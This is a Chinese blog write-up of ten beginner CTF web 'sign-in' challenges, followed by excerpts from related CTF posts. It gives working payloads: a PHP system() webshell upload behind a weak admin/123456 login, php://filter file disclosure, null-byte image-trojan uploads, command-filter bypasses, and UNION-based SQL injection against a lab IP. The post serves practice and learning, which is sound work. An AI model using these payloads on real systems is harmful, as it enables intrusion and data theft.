Web10道签到题

最新推荐文章于 2024-03-21 09:55:02 发布
最新推荐文章于 2024-03-21 09:55:02 发布
阅读量202 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39788411/article/details/133053976
版权
文章涉及一系列网络安全问题,包括使用弱口令如admin123456,PHP代码执行漏洞,文件上传后门,如<?phpsystem(cat/tmp/flag);?>,以及SQL注入攻击,用于获取数据库中的flag信息。此外,还提到了制作图片马(1.png%00.php)以及通过后台管理上传恶意脚本的操作。
摘要由CSDN通过智能技术生成

题目1

image
万能密码

题目2

弱口令 admin 123456登录后台,文件管理上传<?php system('cat /tmp/flag');?>imageimage

题目3

image

题目4

F12发现include.phpinclude.php?file=php://filter/read=convert.base64-encode/resource=include.php
查看文件源码,发现upload.php
上传图片马image
include.php包含一下image

题目5

?rce=ca\t%09/tmp/flag

题目6

查表名?id=-1 union select 1,2,group_concat(table_name)from(information_schema.tables)where(table_schema=database())image
查flag表的列名?id=-1 union select 1,2,group_concat(column_name)from(information_schema.columns)where(table_schema=database())and(table_name='flag')image
查flaghttp://122.114.225.41:20126/?id=-1%20union%20select%201,2,(flag)from(flag)image

题目7

image
做个图片马,1.png%00.phpimage

题目8

image

题目9

admin 123456登录后台 admin/upload.php上传一个一句话马image
然后
上传图片管理那里右键查看路径image

题目10

image

V3g3t4ble
关注
[青少年 CTF] Web签到
piggcs的博客
04-03 658
扫出一个备份文件/index.php.bak,在地址输入/index.php.bak。输入指令python dirsearch.py -u http://xxxx。命令行输入 python,返回版本号则安装成功(环境配置成功)。此工具是Python3工具,所以先要部署Python3环境。建议默认安装到C盘 且 勾选PATH(自动配置环境变量)。进入Python官网后找到自己想要的版本和相应的系统。自动下载一个文件,用记事本打开,得到flag。安装完成后 win+r 输入 cmd。
CTFShow-WEB(签到~5) WP
PP Jun的博客
08-01 1065
LCTF#LCTF2017#web签到1
07-25
web签到目不难, 一共就只有几个点用file协议读取本地文件截断url后面拼接的/, GET请求, 用?#都可以payload其实很简单: file://
web签到1
weixin_59453707的博客
08-07 267
打开靶场 查看源代码(Ctrl+u)
CTFshow WEB web签到
Y1da的博客
04-19 1030
CTFshow WEB web签到 进入环境后F12查看源代码 where is flag? <!-- Y3Rmc2hvd3tiM2ZkZDFlMS03N2E5LTQ5MmMtOWI2Ny1jM2FjMzliNmVhY2R9--> 怀疑注释是base64编码,尝试解码,得到flag ctfshow{b3fdd1e1-77a9-492c-9b67-c3ac39b6eacd} ...
CTFshow:WEB签到1
最新发布
精神大火的博客
03-21 944
ctf学习记录,以有所鞭策激励。从ctf.show开始练习并同步学习。
ctfshow—web签到
HAI_WD的博客
07-24 529
通常这种目都是在F12中的。base64解一下就得到答案。首先看到的是下图所示的内容。
ctfshow web签到
09-12
ctfshow-web中的"web签到"是其中的一目。具体信息如下: 请注意,网站的内容中包含了一个URL:/?url=data://text/plain,<?php system("cat ctf_go_go_go"); ?> 。这个URL可能与web签到有关。 此外,...
ctfshow-web
qq_43618536的博客
07-15 927
ctfshow-web
ctfshow-WEB-web1签到
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息 页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码 Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag <!-- Y3Rmc2hvd3sxNTA5MDI4My03ZWM3LTQ0ZTQtOWJmNS03YWIwMzllNDU4OTN9...
签到
无限迭代中......
12-23 1491
https://ac.nowcoder.com/acm/contest/318/B 解:签到啊,没什么好说的,直接O(n^2)暴力莽就行了。先枚举区间的左端点,然后遍历后面的数据,同时记录一个最大值,如果当前这个数比前面记录的最大值要大则更新答案;若出现小于左端点的数则break。就没了。 C++版本一 /* *@Author: STZG *@Language: C++ */ #i...
鹤壁杯-web签到
qq_51584770的博客
10-08 1253
目源码: <?php highlight_file(__FILE__); include "./flag.php"; include "./result.php"; if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){ $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_
Hackergame 2021 Web1 签到
Landasika的博客
10-31 667
本人小白入门,不到之处请大侠指点!!! 签到,就直接上思路。 第一步、观察并打开目。 好像有几个按钮,我们随便点点试试。 果然,点了“Next”按钮之后,url发生了改变,可以判断这个是GET请求,再根据前面观察到的目意思,直接改url使得页面中的时间是比赛那几天就行了。 ...
第二届强网杯 web签到
StriveBen的博客
04-02 2645
前言 线上赛的时候,没有充裕的时间打,后期做了做,虽以记之. 时间好快,2018已经过去了1/4,加油. 欢迎进群交流: 363034250 目及知识点 目描述 该目一共分为三关,前两关都是基本的php中md5()函数特性利用.下面分别对每一关进行解析. 第一关 源码 &lt;h2&gt;The Fisrt Easy Md5 Challenge&lt;/...
2020年DDCTF-web签到
读万卷书,行万里路。
09-14 949
2020 年 DDCTF 中 web 签到解。(web????只做出来这,第二天有事) web签到 步骤1:JWT绕过 图1:目给定出事条件。 向 api 发送请求,得到响应如下,data 的数据格式和 jwt 相似,猜测为 jwt 绕过。 { "code": 0, "message": "success", "data": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6InN0ciIsInB3ZCI6InN0ciIsI
CTF show----web笔记(web签到~web6)
weixin_45908624的博客
11-22 4147
web签到~web6 解笔记
{青少年CTF} Web签到 详解
lfc18950509270的博客
07-26 1301
又是除了几个字外一片空白,可能有的同学照例打开源代码看了起来,但是什么也没发现。这时候,我们可能就需要看一下它的目录下有没有什么文件里藏着flag。可以发现,扫描出目录下存在一个加index.php.bak的文件,直接复制到浏览器中,下载得到它,直接打开即可发现flag。至于它的安装和使用方法你们可以自己搜一下,或者你们需要在找个时间单独写一篇。这边使用的命令是dirsearch -u ,u指的就是url的意思。这样我们又有了一种思路可以拿到flag了,虽然也比较简单。进入之后可以看到是长这样的。
ctfshow菜狗杯-web签到 详细解过程
a_153161的博客
01-19 1519
ctfshow 菜狗杯web签到详细解体过程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值